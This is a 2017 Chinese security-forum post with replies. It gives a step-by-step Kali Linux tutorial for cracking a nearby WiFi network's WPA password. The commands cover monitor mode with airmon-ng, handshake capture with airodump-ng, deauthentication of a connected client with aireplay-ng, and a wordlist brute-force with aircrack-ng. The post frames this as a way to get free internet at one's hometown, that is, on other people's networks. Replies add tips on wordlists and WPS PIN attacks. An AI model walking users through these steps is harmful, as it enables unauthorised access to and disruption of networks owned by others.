用户
搜索
  • TA的每日心情
    无聊
    2017-3-1 18:47
  • 签到天数: 38 天

    连续签到: 1 天

    [LV.5]常住居民I

    i春秋作家

    Rank: 7Rank: 7Rank: 7

    11

    主题

    115

    帖子

    730

    魔法币
    收听
    4
    粉丝
    17
    注册时间
    2015-11-20

    i春秋签约作者

    发表于 2017-1-22 19:48:38 34167936
    本帖最后由 ohlinge 于 2017-1-22 11:50 编辑
    文章难易度【★★
    文章阅读点/知识点: Kali linux、wifi破解
    文章作者: 0h1in9e
    本文参与i春秋社区原创文章奖励计划,未经许可禁止转载

    前言
    临近春节,想必大家都已经回到老家准备过年了吧。这个时候,很多人出现了新的困惑,老家没网没WiFi,怎么破?流量烧不起啊……
    对Kali Linux的学习也有段时间了,之前主要集中在Web层面的一些应用。最近对无线Hacker比较感兴趣,包括WiFi破解、Kali实现钓鱼WiFi以及GSM嗅探等。今天先分享下Kali下面破解WiFi的一个简明教程吧!

    0x01 开始前的准备
    环境:Kali Rolling/Kali2016.1 (WMware 11)
    设备:Ralink 802.11 n WLAN(淘宝即可购得,新版kali兼容大量无线网卡驱动,找一款能兼容的外置无线网卡即可)
    所需软件:aircrack(Kali自带自带)
    关于Kali linux版本的说明:
    Kali linux经历了从kali 1.0 到kali 2.0,再从2.0到现在的Rolling版本的过渡。可能你见过kali 2016.1 、kali 2016.2这两个版本,其实它们都属于kali Rolling版本。rolling即指滚动更新,意味着kali不会再出3.0之类的版本了,会一直延续rolling实时更新。

    首先把外置无线网卡插入电脑,然后加载入当前kali虚拟机。完成后用`ifconfig`命令查看无线网卡是否安装成功:如图wlan0
    1.png
    并将wlan0网卡开启混杂模式:
    [AppleScript] 纯文本查看 复制代码
        airmon-ng start wlan0
        #提示要杀掉一些进程,根据提示进行即可
        airmon-ng check kill 
        airmon-ng start wlan0


    2.png

    0x02 开始抓取握手包
    1. 首先,查看附近WiFi热点,使用命令`airodump-ng wlan0mon`
    3.png

    2. 选取其中信号较好的WiFi热点,在这里我们选取一个目标(4227X)

    3.使用airodump-ng对选取的WiFi热点进行cap监听与获取:
    [AppleScript] 纯文本查看 复制代码
    airodump-ng -c 11 --bssid EC:26:CA:34:OA:2C -w 4227X  wlan0mon
    
    -c 通道值 WiFi热点所对应的CH值(上图中可看到)
    --bssid 需要破解WiFi的MAC值
    -w cap文件名
    wlan0mon 启用混杂模式的网卡名


    4.png

    4. 可以看到4227X这个WiFi热点下有7个设备正在连接中,选取其中一个你喜欢的,进行断网从而抓取之握手包:
    [AppleScript] 纯文本查看 复制代码
    aireplay-ng -0 20 -c 64:5A:04:34:5A:0A -a EC:26:CA:34:OA:2C wlanmon
    
    -0 death模式,20为发送次数
    -c 你所选择要断网操作的客户机MAC
    -a WiFi热点MAC


    如图,可以看到握手包已经抓取到了,接下来就是破解操作了!
    5.png

    0x03 暴力破解
    1. 首先需要一个字典,可以找网上现成的,或者用工具生成一个字典,这里我们用crunch生成一个简单字典:
    6.png

    2.开始跑握手包
    [AppleScript] 纯文本查看 复制代码
    #首先ls查看当前目录所产生的握手包
    aircrack-ng -w die.txt 4227X-01.cap


    7.png

    3. 字典的设置还是比较关键的!当出现Key Found 的时候表明你成功了!
    8.png

    总结
    其实这仅仅是WiFi破解的其中一种简单的方法,这里用了最新版本的kali linux系统。其实kali在无线渗透方面很有优势,集成了各种专用软件。当然,小巧的CDlinux也可以破解WiFi,不过对于网卡的支持没有kali多。而且如果你是一名渗透学习者的话,建议使用kali。同时,也祝大家新年快乐,每天有网可以上(手动滑稽)









    评分

    参与人数 1价值分 +10 收起 理由
    zusheng + 10 价值分奖励

    查看全部评分

    本帖被以下淘专辑推荐:

    欢迎访问我的博客 https://www.ohlinge.cn
    发表于 2017-2-9 18:13:58
    文章奖励介绍及评分标准:http://bbs.ichunqiu.com/thread-7869-1-1.html,如有疑问请加QQ:286894635!
    奖金点评
    0逻辑理的还行,不过技术比较简单,而且同类型文章过多。

    Hacking the earth.My Blog:https://isbase.cc
    使用道具 举报 回复
    发表于 2017-2-9 20:48:20
    我看的一个关于wifi破解教程 里

    aireplay-ng -0 20 -a目标ap的mac  -c 攻击者网卡mac   为什么是攻击者的mac 还是 两个都可以
    使用道具 举报 回复
    教程比较基础,适合小白入手。应该再分享下字典的制作,那么就饮用更加了
    另外结合wifite,跑pin码破解开启WPS的路由器,效率更高
    使用道具 举报 回复
    这种的密码稍微强一点根本破不出来 只有弱密码可能性大点 再说 这种一样帖子满大街都是 再发就没意思了 百度一大把
    使用道具 举报 回复
    发表于 2017-1-23 01:19:23
    板凳                    
    使用道具 举报 回复
    基本没什么用,还是字典的问题,密码都会设置好记的有意义的特殊字符,所以基本跑不出来
    使用道具 举报 回复
    像这样的破解wifi的水就不要发了  满大街都是
    使用道具 举报 回复
    发表于 2017-2-4 19:00:08
    老家的wifi  猜几次 估计就上去了
    使用道具 举报 回复
    沙发
    使用道具 举报 回复
    发表于 2017-1-23 10:48:11
    感谢楼主分享
    使用道具 举报 回复
    发表于 2017-1-23 11:44:28
    然而跑不出来也白搭
    使用道具 举报 回复
    发表于 2017-1-23 12:13:23
      密码太难怎么破  
    使用道具 举报 回复
    不错哦,好赞啊
    使用道具 举报 回复
    发表于 2017-1-23 16:18:16
    用奶瓶破解wife比kali强百倍
    使用道具 举报 回复
    发表于 2017-1-23 18:01:44
    wifi破解得有个2000万的大字典
    使用道具 举报 回复
    发表于 2017-1-24 12:41:20
    赞一个
    使用道具 举报 回复
    发表于 2017-1-24 13:41:47
    厉害了,,,,
    使用道具 举报 回复
    关键是还要买设备啊+
    使用道具 举报 回复
    发表于 2017-1-25 15:27:35
    厉害了我的哥
    求知若饥,虚心若愚。
    使用道具 举报 回复
    发表于 2017-1-26 11:20:10
    用wifi万能钥匙不更好么
    使用道具 举报 回复
    发表于 2017-1-28 18:14:33
    还不如来pin,钓鱼更实在
    使用道具 举报 回复
    123下一页
    发新帖
    您需要登录后才可以回帖 登录 | 立即注册